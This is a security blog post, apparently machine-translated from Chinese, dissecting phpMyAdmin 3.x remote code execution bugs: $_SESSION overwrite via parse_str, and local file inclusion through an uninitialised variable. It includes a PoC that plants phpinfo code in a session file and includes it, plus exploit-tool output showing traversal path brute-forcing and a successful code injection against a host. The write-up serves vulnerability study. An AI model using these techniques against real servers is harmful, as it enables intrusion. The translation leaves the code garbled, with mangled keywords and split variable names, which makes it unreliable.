PhpMyAdmin 3. x Vulnerabilities

5up3rh3i' blog

Let's take a look at the vulnerability announcement phpMyAdmin 3.x Multiple Remote Code Executions published by foreigners. Four vulnerabilities are mentioned in the article. However, the key to these vulnerabilities is the first vulnerability, that is, the vulnerability that overwrites the $ _ SESSION variable through parse_str. The third vulnerability is the exploitation after $ _ SESSION. Here, I would like to like the awareness of the vulnerability discoverers and official phpmyadmin staff, because they also acknowledge the three other vulnerabilities and provide corresponding repair methods. For details, see: PMASA-2011-8/7/6/5, which is the "secondary attack vulnerability" I mentioned many times in blog and articles and the repair principle: "All variables entering the function are harmful", "the defense at the moment before entering the function is King "...

Let's take a look at the cause and Utilization of the vulnerability:

File: libraries/auth/swekey. auth. lib. php

If (strstr ($ _ SERVER ['query _ string'], 'session _ to_unset ')! = False)
{
Parse_str ($ _ SERVER ['query _ string']);
Session_write_close ();
Session_id ($ session_to_unset );
Session_start ();
$ _ SESSION = array ();
Session_write_close ();
Session_destroy ();
Exit;
}

For parse_str ($ _ SERVER ['query _ string']);, we should be familiar with the variable overwrite problem, as mentioned in advanced PHP application vulnerability review technology. As for the problem after overwrite $ _ SESSION through parse_str, my understanding of php's $ _ SESSION issue was vague at the time, in addition, due to time issues, I have a full understanding of the phpmyadmin vulnerability submission process. Based on previous experience, I have been setting php. session in ini. auto_start = 1, and then the vulnerability is successfully triggered. This is the exploit published by wofeiwo that requires "session. auto_start = 1 in php. ini configuration.. However, I still don't know why session. auto_start is required. Later, after wofeiwo's instruction, I figured it out:

<? Php
// Sess_1.php
$ _ SESSION ['abcde'] = "aaaa ";
Session_start ();
Var_dump ($ _ SESSION );
?>

<? Php
// Sess_2.php
Session_start ();
$ _ SESSION ['abcde'] = "aaaa ";
Session_start ();
Var_dump ($ _ SESSION );
?>

When session. auto_start = 1: php automatically implements a session_start (). Therefore, session is required when you submit sess_1.php directly. auto_start = 1, $ _ SESSION ['abcde'] = "aaaa. Let's go back to phpmyadmin, so as long as we are in require libraries/auth/swekey. auth. lib. the php file contains session_start. inc. session_start () that meets the requirements is found in php ():

If (! Isset ($ _ COOKIE [$ session_name]) {
// On first start of session we check for errors
// F. e. session dir cannot be accessed-session file not created
$ Orig_error_count = $ GLOBALS ['error _ handler']-> countErrors ();
$ R = session_start ();
If ($ r! = True | $ orig_error_count! = $ GLOBALS ['error _ handler']-> countErrors ()){
Setcookie ($ session_name, '', 1 );
PMA_fatalError ('strsessionstartuperrorgeneral ');
}
Unset ($ orig_error_count );
} Else {
@ Session_start (); // here
}

Then we can submit the file through the home page. The specific file inclusion process will not be analyzed. At this time, the author also gave his exp: phpMyAdmin 3.x Swekey Remote Code Injection Exploit. However, after testing, you will find that the success rate of this exp is not high and the config directory is met in a timely manner, this is because the playload in the exp of the author is enclosed by magic quotes, so there is the exp of oldjun.

The above exp is based on The "The second vulnerability" in The vulnerability announcement. Later, The author gave The exp: fail of "The third vulnerability!

It is also worth mentioning that the Russian M4g found a new exploitation point by exploiting a vulnerability found by se cattle: http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

MOPS-2010-060: PHP Session Serializer Session Data Injection Vulnerability is used. The reason for this Vulnerability is that the PMA_Config type in phpmyadmin session is object, no way to directly overwrite and submit through variables. If you are interested, you can test it yourself.

Finally, there is a vulnerability in The "The fourth vulnerability" that has no exp, So I continue to gain an exp, and finally find that this is The most "valuable" in terms of penetration exploitation! The key code is:

File: libraries/display_tbl.lib.php
Lines: 707-710

If ($ GLOBALS ['cfgrelation'] ['commwork'] & $ GLOBALS ['cfgrelation'] ['mimework'] & $ GLOBALS ['cfg '] ['browsemime '] &! $ _ SESSION ['tmp _ user_values '] ['hide _ transformation']) {
Require_once './libraries/transformations. lib. php ';
$ GLOBALS ['mime _ map'] = PMA_getMIME ($ db, $ table );
}

A typical "variable initialization problem under conditions" means that when the if condition is not met, the variable $ GLOBALS ['mime _ map'] is not assigned a value, that is, the variable is not initialized !! As for the use of exp, I used the method of using the Russian people, including the sesson file, the session directory in the brute force mode will be OK, but what hurts is that php will not allow the session file containing this session, the following test code:

<? Php
$ Sesspath = "/tmp ";
Session_start ();
$ _ SESSION ['abcde'] = "<? Phpinfo ();?> ";
Include ($ sesspath. "sess _". session_id ());
?>

Finally, the following figure shows the exploit effect:

Root @ ubuntu:/home/heige # php./phpmyadmin_include_poc.php-h http: // 192.168.0.10/phpMyAdmin-u root-p-d mysql
.
,)\.
.,/),/),)\
)\(/)/((__(/(/)________________
/\ () |) \/| (__)
(______/| _____ (______ | |\/ | _ | |__ | |___ | ______________________
|||\||||) | |||||||||||||/// ||||||||||||||||
| _/|__ | |__ | \__ \_|__ | |__ |
==|__ | ==============================|__ | ======================== ==============|__ | ====================================== ======================================
# Pma3exp-phpMyAdmin3 local include exploit
# By 80vul
# Codz base on http://www.xxor.se/uploads/phpmyadmin_preg_replace_rce_poc.php
# Reference: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html


[I] Running...
[*] Contacting server to authenticate.
[I] Cookie: pma_mcrypt_iv = O8GeDrSMyp4 % 3D; phpMyAdmin = Shenzhen; pmaUser-1 = Zo1Pp49vdR0 % 3D; pmaPass-1 = ggEX % 2BxDMg3A % 3D
[I] Token: 1db063c5b08202ea26057a6cf3e82a5d
[I] Session: 8e295790f223d07054aab13c7fc87ac66291_c7
[*] Please set args-s 8e295790f223d07054aab13c7fc87ac66291_c7 and try again
[*] Contacting server to poison some _ SESSION variables.
Root @ ubuntu:/home/heige # php./phpmyadmin_include_poc.php-h http: // 192.168.0.10/phpMyAdmin-u root-p-d mysql-s 8e295790f223d07054aab13c7fc87ac66291_c7
.
,)\.
.,/),/),)\
)\(/)/((__(/(/)________________
/\ () |) \/| (__)
(______/| _____ (______ | |\/ | _ | |__ | |___ | ______________________
|||\||||) | |||||||||||||/// ||||||||||||||||
| _/|__ | |__ | \__ \_|__ | |__ |
==|__ | ==============================|__ | ======================== ==============|__ | ====================================== ======================================
# Pma3exp-phpMyAdmin3 local include exploit
# By 80vul
# Codz base on http://www.xxor.se/uploads/phpmyadmin_preg_replace_rce_poc.php
# Reference: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html


[I] Running...
[*] Contacting server to authenticate.
[I] Cookie: pma_mcrypt_iv = MSiItAKLpTs % 3D; phpMyAdmin = large; pmaUser-1 = wlbi7hEJiGE % 3D; pmaPass-1 = XypvwpApS5k % 3D
[I] Token: 4ca3b4ca2bc3cf6c779425493366c181
[I] Session: d1e429fe86d129be587056a09d1f44b56a48e859
[*] Contacting server to poison some _ SESSION variables.
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Temp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/lib/php/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/lib/php4/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/lib/php5/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/lib/php/session/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/lib/php4/session/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/lib/php5/session/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Shared/sessionssess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/php_sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Var/sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Tmp/php_sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Tmp/sessions/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-]... /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-] ../Tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[-].../../Tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-bad path
[+].../Tmp/sess_8e295790f223d07054aab13c7fc87ac66291_c7-good path
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!

The story seems to be over here, but it didn't take long before a PMASA-2011-12 or the foreigner, or the file, or the parse_str ($ _ SERVER ['query _ string']); there is a vulnerability called "similarity Vulnerability "! This issue may be mentioned in my later documents, but it is only possible to reach parse_str in the PMASA-2011-12 ($ _ SERVER ['query _ string']); this code location is very demanding! If you are interested, please analyze it by yourself :)

Finally, thank you for your friends!